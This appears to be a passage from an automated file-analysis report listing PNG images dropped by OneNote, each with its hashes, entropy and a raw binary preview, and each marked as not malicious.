                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
